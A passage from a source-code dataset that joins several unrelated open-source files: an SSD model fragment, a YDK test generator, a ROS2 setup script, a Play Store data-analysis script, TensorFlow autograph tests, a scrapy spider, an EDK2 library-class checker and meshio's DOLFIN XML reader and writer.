deepPointwiseConv2d(in_channels=base_net.base_channel * 8, out_channels=2 * num_classes, kernel_size=3, padding=1),
deepPointwiseConv2d(in_channels=base_net.base_channel * 16, out_channels=2 * num_classes, kernel_size=3, padding=1),
Conv2d(in_channels=base_net.base_channel * 16, out_channels=3 * num_classes, kernel_size=3, padding=1)
])
return SSD(num_classes, base_net_model, source_layer_indexes,
extras, classification_headers, regression_headers, is_test=is_test, config=rfb_config, device=device)
|
the-stack_0_3807 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""
test_printer.py
Test printer.
"""
from ydkgen.common import iscppkeyword
from ydkgen.builder import TestBuilder
from ydkgen.builder import FixtureBuilder
from .test_fixture_printer import FixturePrinter
from ydkgen.common import get_top_class, get_element_path, get_path_sep, get_obj_name, \
get_qn, is_reference_prop, is_terminal_prop, is_empty_prop, \
is_identity_prop, is_decimal64_prop
_IGNORE_TESTS = set({'ietf_netconf_acm'})
class TestPrinter(FixturePrinter):
"""Test printer."""
def __init__(self, ctx, lang):
super(TestPrinter, self).__init__(ctx, lang)
def print_tests(self, package, identity_subclasses):
"""Print all test case."""
self.package = package
self.identity_subclasses = identity_subclasses
test_builder = TestBuilder(self.lang, identity_subclasses)
fixture_builder = FixtureBuilder(self.lang, identity_subclasses)
test_builder.build_test(package)
imports = fixture_builder.get_imports(package, test_builder)
self.print_fixture_head(package, imports)
if package.name not in _IGNORE_TESTS:
self._print_test_case(package, imports, test_builder)
self.print_fixture_tail(package)
def _print_test_case(self, package, imports, test_builder):
"""Print a single test case."""
for test_case in test_builder.test_cases:
stmts = test_case.stmts
test_name = test_case.test_name
clazz = test_case.clazz
top_classes = list(test_case.ref_top_classes.values())
self._print_test_case_header(test_name)
self._print_test_case_body(stmts, clazz, top_classes)
self._print_test_case_trailer()
def _print_test_case_body(self, stmts, clazz, top_classes):
self._print_test_case_requisites(stmts)
self._print_test_case_crud_stmts(stmts, clazz, top_classes)
self._print_test_case_cleanup(clazz, top_classes)
self._print_test_case_compare(clazz)
def _print_test_case_requisites(self, stmts):
self._print_requsite_declarations(stmts)
self._print_requisite_stmts(stmts)
self._print_unadjust_leaflist_append_stmts(stmts)
self._print_requisite_reference_stmts(stmts)
self._print_requisite_adjustments(stmts)
self._print_requisite_leaflist_adjusted(stmts)
def _print_requsite_declarations(self, stmts):
for path, val in stmts.declaration_stmts.items():
self._write_end(self.declaration_fmt.format(path, val))
def _print_unadjust_leaflist_append_stmts(self, stmts):
for path, val in stmts.unadjusted_leaflist_appends:
self._write_end(self.leaflist_append_fmt.format(path, val))
def _print_requisite_stmts(self, stmts):
sorted_paths = sorted(list(stmts.append_stmts.keys()) +
list(stmts.assignment_stmts.keys()))
for path in sorted_paths:
if path in stmts.append_stmts:
self._print_requisite_list_append(stmts, path)
elif path in stmts.assignment_stmts:
self._print_requisite_assignment(stmts, path)
def _print_requisite_list_append(self, stmts, path):
val = stmts.append_stmts[path]
self._print_requisite_list_parent_pointer(path, val)
self._write_end(self.append_fmt.format(path, val))
def _print_requisite_list_parent_pointer(self, path, val):
# parent pointer is set by YList append method in Python,
# no need to print
if self.lang == 'cpp' and self.sep in path:
parent = self.sep.join(path.split(self.sep)[:-1])
parent_path = self.sep.join([val, 'parent'])
self._write_end(self.cpp_leaf_fmt.format(parent_path, parent))
def _print_requisite_assignment(self, stmts, path):
val = stmts.assignment_stmts[path]
fmt = self.get_assignment_fmt(path)
self._write_end(fmt.format(path, val))
def _print_requisite_reference_stmts(self, stmts):
for path in sorted(stmts.reference_stmts):
val = stmts.reference_stmts[path]
self._write_end(self.ref_fmt.format(path, val))
def _print_requisite_adjustments(self, stmts):
for path in sorted(stmts.adjustment_stmts):
val = stmts.adjustment_stmts[path]
self._write_end(self.ref_fmt.format(path, val))
for path in sorted(stmts.reference_adjustment_stmts):
val = stmts.reference_adjustment_stmts[path]
self._write_end(self.ref_fmt.format(path, val))
def _print_requisite_leaflist_adjusted(self, stmts):
for path, val in stmts.adjusted_leaflist_appends.items():
self._write_end(self.leaflist_append_fmt.format(path, val))
def _print_test_case_crud_stmts(self, stmts, clazz, top_classes):
for top_class in top_classes:
self._print_crud_create_stmts(top_class)
top_class = get_top_class(clazz)
self._print_crud_create_stmts(top_class)
self._print_crud_read_stmts(top_class)
def _print_crud_create_stmts(self, top_class):
top_obj_name = get_obj_name(top_class)
self._print_logging('Creating {}...'.format(top_obj_name))
fmt = self._get_crud_fmt('create')
self._write_end(fmt.format(top_obj_name))
def _print_crud_read_stmts(self, top_class):
top_obj_name = get_obj_name(top_class)
read_obj_name = '{}_read'.format(top_obj_name)
filter_obj_name = '{}_filter'.format(top_obj_name)
qn = get_qn(self.lang, top_class)
self._print_logging('Reading {}...'.format(top_obj_name))
self._write_end(self.declaration_fmt.format(filter_obj_name, qn))
fmt = self._get_crud_fmt('read')
stmt = fmt.format(filter_obj_name)
fmt = self.read_ret_fmt
if self.lang == 'py':
self._write_end(fmt.format(read_obj_name, stmt))
elif self.lang == 'cpp':
self._write_end('auto read_unique_ptr = {}'.format(stmt))
self._write_end('CHECK( read_unique_ptr != nullptr)')
self._write_end(fmt.format(read_obj_name, qn, 'read_unique_ptr'))
def _print_test_case_cleanup(self, clazz, top_classes):
self._print_crud_delete_stmts(clazz)
for clazz in top_classes:
self._print_crud_delete_stmts(clazz)
def _print_crud_delete_stmts(self, clazz):
top_class = get_top_class(clazz)
top_obj_name = get_obj_name(top_class)
fmt = self._get_crud_fmt('delete')
self._print_logging('Deleting {}...'.format(top_obj_name))
self._write_end(fmt.format(top_obj_name))
def _print_test_case_compare(self, clazz):
self._print_logging('Comparing leaf/leaf-lists...')
for prop in clazz.properties():
if is_reference_prop(prop) or is_terminal_prop(prop):
# unable to compare empty
# read object will not be assigned to Empty() automatically
if not is_empty_prop(prop):
self._print_compare_stmt(prop)
def _print_compare_stmt(self, prop):
if is_identity_prop(prop) or is_decimal64_prop(prop):
# unable to compare decimal64 in Python
# unable to compare identity in C++ and Python
return
lhs = self._get_element_path(prop)
top_class_name, path = lhs.split(self.sep, 1)
top_class_name = '{}_read'.format(top_class_name)
rhs = self.sep.join([top_class_name, path])
self._write_end(self.compare_fmt.format(lhs, rhs))
def _print_test_case_header(self, test_name):
if self.lang == 'py':
self._writeln('def test_{}s(self):'.format(test_name))
elif self.lang == 'cpp':
self._writeln('TEST_CASE_METHOD( ConnectionFixture, "{}_{}_test" )'.format(self.package.name, test_name))
self._writeln('{')
self._lvl_inc()
self._lvl_inc()
def _print_test_case_trailer(self):
self._lvl_dec()
if self.lang == 'py':
self._bline()
elif self.lang == 'cpp':
self._lvl_dec()
self._writeln('}')
self._bline()
def _print_logging(self, msg):
self._bline()
if self.lang == 'py':
self._write_end('logger.info("{}")'.format(msg))
def get_assignment_fmt(self, path):
fmt = '{} = {}'
if self.sep not in path and self.lang == 'cpp':
fmt = 'auto {} = {}'
return fmt
def _get_crud_fmt(self, oper):
if self.lang == 'py':
fmt = 'self.crud.{}(self.ncc, {{}})'.format(oper)
elif self.lang == 'cpp':
if iscppkeyword(oper):
oper = '{}_'.format(oper)
fmt = 'm_crud.{}(*m_provider, *{{}})'.format(oper)
return fmt
@property
def declaration_fmt(self):
fmt = '{} = {}()'
if self.lang == 'cpp':
fmt = 'auto {} = std::make_unique<{}>()'
return fmt
@property
def leaflist_append_fmt(self):
fmt = '{}.append({})'
if self.lang == 'cpp':
fmt = '{}.append(std::move({}))'
return fmt
@property
def append_fmt(self):
fmt = '{}.append({})'
if self.lang == 'cpp':
fmt = '{}.emplace_back(std::move({}))'
return fmt
@property
def cpp_leaf_fmt(self):
return '{} = {}.get()'
@property
def ref_fmt(self):
fmt = '{} = {}'
if self.lang == 'cpp':
fmt = '{} = {}.get()'
return fmt
@property
def compare_fmt(self):
fmt = 'self.assertEqual({}, {})'
if self.lang == 'cpp':
fmt = 'CHECK( {} == {} )'
return fmt
@property
def read_ret_fmt(self):
fmt = '{} = {}'
if self.lang == 'cpp':
fmt = 'auto {} = dynamic_cast<{}*>({}.get())'
return fmt
def _get_element_path(self, element):
return get_element_path(self.lang, element)
@property
def sep(self):
return get_path_sep(self.lang)
|
the-stack_0_3809 | from setuptools import setup
package_name = 'carebt_kb'
setup(
name=package_name,
version='0.0.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
maintainer='Andreas Steck',
maintainer_email='[email protected]',
description='A ROS2 Knowledge Base implementation.',
license='Apache License 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'carebt_kb = carebt_kb.carebt_kb:main'
],
},
)
|
the-stack_0_3810 | # %%
import pandas as pd
import numpy as np
# %%
# Data Preprocess
df=pd.read_csv("./dataset/google-play-store-apps/googleplaystore.csv")
for i in df:
print(df[i].value_counts())
df.replace("NaN",np.nan,inplace=True)
df.isnull().sum()
# %%
df.dropna(inplace=True)
# %%
out=pd.DataFrame(df,columns=["App","Category","Rating","Reviews","Size","Installs","Price","ContentRating"])
out.to_csv("preprocess.csv",index=None)
# %%
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus'] = False
# Chinese labels do not render correctly in matplotlib by default; the two lines above set a font that supports them
df=pd.read_csv("./dataset/google-play-store-apps/googleplaystore.csv")
df.drop_duplicates(subset='App', inplace=True)  # drop duplicate apps
df = df[df['AndroidVer'].notna()]  # drop null values ('x != np.nan' is always True, so notna() is used instead)
df = df[df['AndroidVer'] != 'NaN']  # drop null values stored as the string 'NaN'
df = df[df['Installs'] != 'Free']  # drop samples whose columns are obviously shifted/mistyped
df = df[df['Installs'] != 'Paid']  # drop samples whose columns are obviously shifted/mistyped
print('Number of apps in the dataset : ' , len(df))
df['Installs']= df['Installs'].apply(lambda x: x.replace('+', '') if '+' in str(x) else x)
df['Installs']= df['Installs'].apply(lambda x: x.replace(',', '') if ',' in str(x) else x)
df['Installs']= df['Installs'].apply(lambda x: int(x))
df['Size'] = df['Size'].apply(lambda x: str(x).replace('Varies with device', 'NaN') if 'Varies with device' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: str(x).replace('M', '') if 'M' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: str(x).replace(',', '') if 'M' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: float(str(x).replace('k', '')) / 1000 if 'k' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: float(x))
df['Installs']=df['Installs'].apply(lambda x: float(x))
df['Price'] = df['Price'].apply(lambda x: str(x).replace('$', '') if '$' in str(x) else str(x))
df['Price'] = df['Price'].apply(lambda x: float(x))
df['Reviews']= df['Reviews'].apply(lambda x: int(x))
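# Illustrative effect of the cleaning above: Installs '10,000+' -> 10000.0, Size '19M' -> 19.0,
# Size '201k' -> 0.201, Price '$4.99' -> 4.99, Reviews '159' -> 159.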
# %%
plt.figure(figsize=(15,10))
g=sns.countplot(x="Category",data=df, palette = "Set1")
g.set_xticklabels(g.get_xticklabels(), rotation=90, ha="right")
plt.savefig('CountApps.png', dpi=1000)
plt.show()
# %%
x = df['Rating'].dropna()
y = df['Size'].dropna()
z = df['Installs'][df.Installs!=0].dropna()
p = df['Reviews'][df.Reviews!=0].dropna()
t = df['Type'].dropna()
price = df['Price']
p= sns.pairplot(pd.DataFrame(list(zip(x, y, np.log(z), np.log10(p), t, price)),
columns=['Rating','Size', 'Installs', 'Reviews', 'Type', 'Price']), hue='Type', palette="Set2")
plt.savefig('relation.png', dpi=300)
plt.show()
# %%
plt.figure(figsize=(10,10))
sns.boxplot(x="Type", y="Rating", hue="ContentRating", data=df, palette="PRGn")
plt.savefig('box.png', dpi=600)
plt.show()
# %%
subset_df= df[df.Category.isin(['GAME', 'FAMILY', 'PHOTOGRAPHY', 'MEDICAL', 'TOOLS', 'FINANCE','LIFESTYLE','BUSINESS'])]
sns.set_style('darkgrid')
fig, ax = plt.subplots()
fig.set_size_inches(15, 8)
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus'] = False
p = sns.stripplot(x="Price", y="Category", data=subset_df, jitter=True, linewidth=1)
#title = ax.set_title('Price trend of apps by category', size=25)
plt.savefig('不同类别的App的价格趋势.png', dpi=300)
plt.show()
# %%
df[['Category', 'App']][df.Price > 200]
fig, ax = plt.subplots()
fig.set_size_inches(15, 8)
subset_df_price= subset_df[subset_df.Price<100]
p = sns.stripplot(x="Price", y="Category", data=subset_df_price, jitter=True, linewidth=1)
plt.savefig('Price.png', dpi=300)
plt.show()
# %%
|
the-stack_0_3811 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for control_flow module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.converters import control_flow
from tensorflow.python.autograph.core import converter_testing
from tensorflow.python.autograph.pyct import transformer
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test
class ControlFlowTest(converter_testing.TestCase):
def assertTransformedResult(self, test_fn, inputs, expected):
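    # Convert `test_fn` with the control_flow transformer, run the converted function on
    # `inputs` in a session, and check that the result equals `expected`.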
if not isinstance(inputs, tuple):
inputs = (inputs,)
with self.converted(test_fn, control_flow, {},
constant_op.constant) as result:
with self.cached_session() as sess:
self.assertEqual(sess.run(result.test_fn(*inputs)), expected)
@test_util.run_deprecated_v1
def test_while_basic(self):
def test_fn(n):
i = 0
s = 0
while i < n:
s += i
i += 1
return s, i, n
self.assertTransformedResult(test_fn, constant_op.constant(5), (10, 5, 5))
@test_util.run_deprecated_v1
def test_while_nested(self):
def test_fn(n):
i = 0
j = 0
s = 0
while i < n:
while j < i:
j += 3
u = i + j # 'u' is not defined within the inner loop
s += u
i += 1
j = 0
return s, i, j, n
self.assertTransformedResult(test_fn, constant_op.constant(5),
(25, 5, 0, 5))
@test_util.run_deprecated_v1
def test_while_single_output(self):
def test_fn(n):
while n > 0:
n -= 1
return n
self.assertTransformedResult(test_fn, constant_op.constant(5), 0)
def test_while_variable_defined_in_body(self):
def bad_while_loop(n):
while n > 0:
n -= 1
s = n
return s
node, ctx = self.prepare(bad_while_loop, {})
with self.assertRaises(NameError):
control_flow.transform(node, ctx)
@test_util.run_deprecated_v1
def test_if_basic(self):
def test_fn(n):
a = 0
b = 0
if n > 0:
a = -n
else:
b = 2 * n
return a, b
self.assertTransformedResult(test_fn, constant_op.constant(1), (-1, 0))
self.assertTransformedResult(test_fn, constant_op.constant(-1), (0, -2))
@test_util.run_deprecated_v1
def test_if_complex_outputs(self):
class TestClass(object):
def __init__(self, a, b):
self.a = a
self.b = b
def test_fn(n, obj):
obj.a = 0
obj.b = 0
if n > 0:
obj.a = -n
else:
obj.b = 2 * n
return obj
with self.converted(test_fn, control_flow, {}) as result:
with self.cached_session() as sess:
res_obj = result.test_fn(constant_op.constant(1), TestClass(0, 0))
self.assertEqual(sess.run((res_obj.a, res_obj.b)), (-1, 0))
res_obj = result.test_fn(constant_op.constant(-1), TestClass(0, 0))
self.assertEqual(sess.run((res_obj.a, res_obj.b)), (0, -2))
@test_util.run_deprecated_v1
def test_if_single_output(self):
def test_fn(n):
if n > 0:
n = -n
return n
self.assertTransformedResult(test_fn, constant_op.constant(1), -1)
@test_util.run_deprecated_v1
def test_if_semi(self):
def test_fn(n):
if n > 0:
n = 3
return n
self.assertTransformedResult(test_fn, constant_op.constant(2), 3)
self.assertTransformedResult(test_fn, constant_op.constant(-3), -3)
@test_util.run_deprecated_v1
def test_if_local_var(self):
def test_fn(n):
if n > 0:
b = 4
n = b + 1
return n
self.assertTransformedResult(test_fn, constant_op.constant(1), 5)
self.assertTransformedResult(test_fn, constant_op.constant(-1), -1)
@test_util.run_deprecated_v1
def test_if_no_outputs(self):
def test_fn(n):
if n > 0:
b = 4 # pylint:disable=unused-variable
return n
# Without side effect guards, the if statement will stage a cond,
# but that will be pruned at execution.
self.assertTransformedResult(test_fn, constant_op.constant(1), 1)
self.assertTransformedResult(test_fn, constant_op.constant(-1), -1)
def test_if_imbalanced_outputs(self):
def test_fn(n):
if n > 0:
b = 4
return b
node, ctx = self.prepare(test_fn, {})
with self.assertRaises(transformer.AutoGraphParseError):
control_flow.transform(node, ctx)
@test_util.run_deprecated_v1
def test_simple_for(self):
def test_fn(l):
s1 = 0
s2 = 0
for e in l:
s1 += e
s2 += e * e
return s1, s2
self.assertTransformedResult(test_fn, constant_op.constant([1, 3]), (4, 10))
empty_vector = constant_op.constant([], shape=(0,), dtype=dtypes.int32)
self.assertTransformedResult(test_fn, empty_vector, (0, 0))
@test_util.run_deprecated_v1
def test_for_single_output(self):
def test_fn(l):
s = 0
for e in l:
s += e
return s
self.assertTransformedResult(test_fn, constant_op.constant([1, 3]), 4)
empty_vector = constant_op.constant([], shape=(0,), dtype=dtypes.int32)
self.assertTransformedResult(test_fn, empty_vector, 0)
def test_for_iterated_expression(self):
eval_count = [0]
def count_evals(x):
eval_count[0] += 1
return x
def test_fn(n):
s = 0
for e in count_evals(range(n)):
s += e
return s
ns = {'count_evals': count_evals}
node, ctx = self.prepare(test_fn, ns)
node = control_flow.transform(node, ctx)
with self.compiled(node, ns) as result:
self.assertEqual(result.test_fn(5), 10)
self.assertEqual(eval_count[0], 1)
def test_for_variable_defined_in_body(self):
def bad_for_loop(n):
for i in range(n):
s = i
return s
node, ctx = self.prepare(bad_for_loop, {})
with self.assertRaises(NameError):
control_flow.transform(node, ctx)
@test_util.run_deprecated_v1
def test_for_tuple_unpacking(self):
def test_fn(x_list):
z = tf.constant(0) # pylint:disable=undefined-variable
for i, x in enumerate(x_list):
z = z + x + i
return z
self.assertTransformedResult(test_fn, [3, 3], 7)
if __name__ == '__main__':
test.main()
|
the-stack_0_3813 | import scrapy
from scrapy.loader import ItemLoader
from itemloaders_example.items import QuoteItem
class QuotesWithItemLoaderSpider(scrapy.Spider):
name = "quotes-with-itemloader"
start_urls = [
'http://quotes.toscrape.com',
]
def parse(self, response):
for quote in response.css('div.quote'):
# check the items.QuoteItem class to see how we've defined
# the input and output processors for each one of these fields
il = ItemLoader(item=QuoteItem(), selector=quote)
il.add_css('text', 'span.text::text')
il.add_css('author_name', 'small.author::text')
il.add_css('tags', 'a.tag::text')
il.add_value('url', response.url)
yield il.load_item()
next_page = response.css("li.next > a::attr(href)").extract_first()
if next_page is not None:
url = response.urljoin(next_page)
yield scrapy.Request(url, callback=self.parse)
|
the-stack_0_3817 | # @file LibraryClassCheck.py
#
# Copyright (c) Microsoft Corporation.
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
import logging
import os
from edk2toolext.environment.plugintypes.ci_build_plugin import ICiBuildPlugin
from edk2toollib.uefi.edk2.parsers.dec_parser import DecParser
from edk2toollib.uefi.edk2.parsers.inf_parser import InfParser
from edk2toolext.environment.var_dict import VarDict
class LibraryClassCheck(ICiBuildPlugin):
"""
A CiBuildPlugin that scans the code tree and library classes for undeclared
files
Configuration options:
"LibraryClassCheck": {
IgnoreHeaderFile: [], # Ignore a file found on disk
IgnoreLibraryClass: [] # Ignore a declaration found in dec file
}
"""
def GetTestName(self, packagename: str, environment: VarDict) -> tuple:
""" Provide the testcase name and classname for use in reporting
            testclassname: a descriptive string for the testcase; it may include whitespace
classname: should be patterned <packagename>.<plugin>.<optionally any unique condition>
Args:
packagename: string containing name of package to build
environment: The VarDict for the test to run in
Returns:
a tuple containing the testcase name and the classname
(testcasename, classname)
"""
return ("Check library class declarations in " + packagename, packagename + ".LibraryClassCheck")
def __GetPkgDec(self, rootpath):
try:
allEntries = os.listdir(rootpath)
for entry in allEntries:
if entry.lower().endswith(".dec"):
return(os.path.join(rootpath, entry))
except Exception:
logging.error("Unable to find DEC for package:{0}".format(rootpath))
return None
##
# External function of plugin. This function is used to perform the task of the MuBuild Plugin
#
# - package is the edk2 path to package. This means workspace/packagepath relative.
# - edk2path object configured with workspace and packages path
# - PkgConfig Object (dict) for the pkg
# - EnvConfig Object
# - Plugin Manager Instance
# - Plugin Helper Obj Instance
# - Junit Logger
# - output_stream the StringIO output stream from this plugin via logging
def RunBuildPlugin(self, packagename, Edk2pathObj, pkgconfig, environment, PLM, PLMHelper, tc, output_stream=None):
overall_status = 0
LibraryClassIgnore = []
abs_pkg_path = Edk2pathObj.GetAbsolutePathOnThisSystemFromEdk2RelativePath(packagename)
abs_dec_path = self.__GetPkgDec(abs_pkg_path)
wsr_dec_path = Edk2pathObj.GetEdk2RelativePathFromAbsolutePath(abs_dec_path)
if abs_dec_path is None or wsr_dec_path == "" or not os.path.isfile(abs_dec_path):
tc.SetSkipped()
tc.LogStdError("No DEC file {0} in package {1}".format(abs_dec_path, abs_pkg_path))
return -1
# Get all include folders
dec = DecParser()
dec.SetBaseAbsPath(Edk2pathObj.WorkspacePath).SetPackagePaths(Edk2pathObj.PackagePathList)
dec.ParseFile(wsr_dec_path)
AllHeaderFiles = []
for includepath in dec.IncludePaths:
## Get all header files in the library folder
AbsLibraryIncludePath = os.path.join(abs_pkg_path, includepath, "Library")
if(not os.path.isdir(AbsLibraryIncludePath)):
continue
hfiles = self.WalkDirectoryForExtension([".h"], AbsLibraryIncludePath)
hfiles = [os.path.relpath(x,abs_pkg_path) for x in hfiles] # make package root relative path
hfiles = [x.replace("\\", "/") for x in hfiles] # make package relative path
AllHeaderFiles.extend(hfiles)
if len(AllHeaderFiles) == 0:
tc.SetSkipped()
tc.LogStdError(f"No Library include folder in any Include path")
return -1
# Remove ignored paths
if "IgnoreHeaderFile" in pkgconfig:
for a in pkgconfig["IgnoreHeaderFile"]:
try:
tc.LogStdOut("Ignoring Library Header File {0}".format(a))
AllHeaderFiles.remove(a)
                except ValueError:
tc.LogStdError("LibraryClassCheck.IgnoreHeaderFile -> {0} not found. Invalid Header File".format(a))
logging.info("LibraryClassCheck.IgnoreHeaderFile -> {0} not found. Invalid Header File".format(a))
if "IgnoreLibraryClass" in pkgconfig:
LibraryClassIgnore = pkgconfig["IgnoreLibraryClass"]
## Attempt to find library classes
for lcd in dec.LibraryClasses:
## Check for correct file path separator
if "\\" in lcd.path:
tc.LogStdError("LibraryClassCheck.DecFilePathSeparator -> {0} invalid.".format(lcd.path))
logging.error("LibraryClassCheck.DecFilePathSeparator -> {0} invalid.".format(lcd.path))
overall_status += 1
continue
if lcd.name in LibraryClassIgnore:
tc.LogStdOut("Ignoring Library Class Name {0}".format(lcd.name))
LibraryClassIgnore.remove(lcd.name)
continue
logging.debug(f"Looking for Library Class {lcd.path}")
try:
AllHeaderFiles.remove(lcd.path)
except ValueError:
tc.LogStdError(f"Library {lcd.name} with path {lcd.path} not found in package filesystem")
logging.error(f"Library {lcd.name} with path {lcd.path} not found in package filesystem")
overall_status += 1
## any remaining AllHeaderFiles are not described in DEC
for h in AllHeaderFiles:
tc.LogStdError(f"Library Header File {h} not declared in package DEC {wsr_dec_path}")
logging.error(f"Library Header File {h} not declared in package DEC {wsr_dec_path}")
overall_status += 1
## Warn about any invalid library class names in the ignore list
for r in LibraryClassIgnore:
tc.LogStdError("LibraryClassCheck.IgnoreLibraryClass -> {0} not found. Library Class not found".format(r))
logging.info("LibraryClassCheck.IgnoreLibraryClass -> {0} not found. Library Class not found".format(r))
# If XML object exists, add result
if overall_status != 0:
tc.SetFailed("LibraryClassCheck {0} Failed. Errors {1}".format(wsr_dec_path, overall_status), "CHECK_FAILED")
else:
tc.SetSuccess()
return overall_status
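# A minimal illustration of the two options read by RunBuildPlugin above.
# This is a hypothetical package CI settings snippet (the header path and
# library-class name are made up for illustration):
#
#   "LibraryClassCheck": {
#       "IgnoreHeaderFile": ["Include/Library/InternalFooLib.h"],
#       "IgnoreLibraryClass": ["FooInternalLib"]
#   }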
|
the-stack_0_3820 | """
I/O for DOLFIN's XML format, cf.
<https://people.sc.fsu.edu/~jburkardt/data/dolfin_xml/dolfin_xml.html>.
"""
import logging
import os
import pathlib
import re
from xml.etree import ElementTree as ET
import numpy
from .._exceptions import ReadError, WriteError
from .._helpers import register
from .._mesh import Mesh
def _read_mesh(filename):
dolfin_to_meshio_type = {"triangle": ("triangle", 3), "tetrahedron": ("tetra", 4)}
# Use iterparse() to avoid loading the entire file via parse(). iterparse()
# allows to discard elements (via clear()) after they have been processed.
# See <https://stackoverflow.com/a/326541/353337>.
dim = None
points = None
keys = None
cell_type = None
num_nodes_per_cell = None
for event, elem in ET.iterparse(filename, events=("start", "end")):
if event == "end":
continue
if elem.tag == "dolfin":
# Don't be too strict with the assertion. Some mesh files don't have the
# proper tags.
# assert elem.attrib['nsmap'] \
# == '{\'dolfin\': \'https://fenicsproject.org/\'}'
pass
elif elem.tag == "mesh":
dim = int(elem.attrib["dim"])
cell_type, num_nodes_per_cell = dolfin_to_meshio_type[
elem.attrib["celltype"]
]
cell_tags = [f"v{i}" for i in range(num_nodes_per_cell)]
elif elem.tag == "vertices":
if dim is None:
raise ReadError("Expected `mesh` before `vertices`")
points = numpy.empty((int(elem.attrib["size"]), dim))
keys = ["x", "y"]
if dim == 3:
keys += ["z"]
elif elem.tag == "vertex":
if points is None or keys is None:
raise ReadError("Expected `vertices` before `vertex`")
k = int(elem.attrib["index"])
points[k] = [elem.attrib[key] for key in keys]
elif elem.tag == "cells":
if cell_type is None or num_nodes_per_cell is None:
raise ReadError("Expected `mesh` before `cells`")
cells = [
(
cell_type,
numpy.empty(
(int(elem.attrib["size"]), num_nodes_per_cell), dtype=int
),
)
]
elif elem.tag in ["triangle", "tetrahedron"]:
k = int(elem.attrib["index"])
cells[0][1][k] = [elem.attrib[t] for t in cell_tags]
else:
logging.warning("Unknown entry %s. Ignoring.", elem.tag)
elem.clear()
return points, cells, cell_type
def _read_cell_data(filename):
dolfin_type_to_numpy_type = {
"int": numpy.dtype("int"),
"float": numpy.dtype("float"),
"uint": numpy.dtype("uint"),
}
cell_data = {}
dir_name = pathlib.Path(filename).resolve().parent
# Loop over all files in the same directory as `filename`.
basename = pathlib.Path(filename).stem
for f in os.listdir(dir_name):
# Check if there are files by the name "<filename>_*.xml"; if yes,
# extract the * pattern and make it the name of the data set.
out = re.match(f"{basename}_([^\\.]+)\\.xml", f)
if not out:
continue
name = out.group(1)
parser = ET.XMLParser()
tree = ET.parse((dir_name / f).as_posix(), parser)
root = tree.getroot()
mesh_functions = list(root)
if len(mesh_functions) != 1:
raise ReadError("Can only handle one mesh function")
mesh_function = mesh_functions[0]
if mesh_function.tag != "mesh_function":
raise ReadError()
size = int(mesh_function.attrib["size"])
dtype = dolfin_type_to_numpy_type[mesh_function.attrib["type"]]
data = numpy.empty(size, dtype=dtype)
for child in mesh_function:
if child.tag != "entity":
raise ReadError()
idx = int(child.attrib["index"])
data[idx] = child.attrib["value"]
if name not in cell_data:
cell_data[name] = []
cell_data[name].append(data)
return cell_data
def read(filename):
points, cells, _ = _read_mesh(filename)
cell_data = _read_cell_data(filename)
return Mesh(points, cells, cell_data=cell_data)
def _write_mesh(filename, points, cell_type, cells):
stripped_cells = [c for c in cells if c.type == cell_type]
meshio_to_dolfin_type = {"triangle": "triangle", "tetra": "tetrahedron"}
if any(c.type != cell_type for c in cells):
discarded_cell_types = {c.type for c in cells if c.type != cell_type}
logging.warning(
"DOLFIN XML can only handle one cell type at a time. "
"Using %s, discarding %s.",
cell_type,
", ".join(discarded_cell_types),
)
dim = points.shape[1]
if dim not in [2, 3]:
raise WriteError(f"Can only write dimension 2, 3, got {dim}.")
coord_names = ["x", "y"]
if dim == 3:
coord_names += ["z"]
with open(filename, "w") as f:
f.write("<dolfin nsmap=\"{'dolfin': 'https://fenicsproject.org/'}\">\n")
ct = meshio_to_dolfin_type[cell_type]
f.write(f' <mesh celltype="{ct}" dim="{dim}">\n')
num_points = len(points)
f.write(f' <vertices size="{num_points}">\n')
for idx, point in enumerate(points):
s = " ".join(f'{xyz}="{p}"' for xyz, p in zip("xyz", point))
f.write(f' <vertex index="{idx}" {s} />\n')
f.write(" </vertices>\n")
num_cells = 0
for c in stripped_cells:
num_cells += len(c.data)
f.write(f' <cells size="{num_cells}">\n')
idx = 0
for ct, cls in stripped_cells:
type_string = meshio_to_dolfin_type[ct]
for cell in cls:
s = " ".join(f'v{k}="{c}"' for k, c in enumerate(cell))
f.write(f' <{type_string} index="{idx}" {s} />\n')
idx += 1
f.write(" </cells>\n")
f.write(" </mesh>\n")
f.write("</dolfin>")
def _numpy_type_to_dolfin_type(dtype):
types = {
"int": [numpy.int8, numpy.int16, numpy.int32, numpy.int64],
"uint": [numpy.uint8, numpy.uint16, numpy.uint32, numpy.uint64],
"float": [numpy.float16, numpy.float32, numpy.float64],
}
for key, numpy_types in types.items():
for numpy_type in numpy_types:
if numpy.issubdtype(dtype, numpy_type):
return key
raise WriteError("Could not convert NumPy data type to DOLFIN data type.")
def _write_cell_data(filename, dim, cell_data):
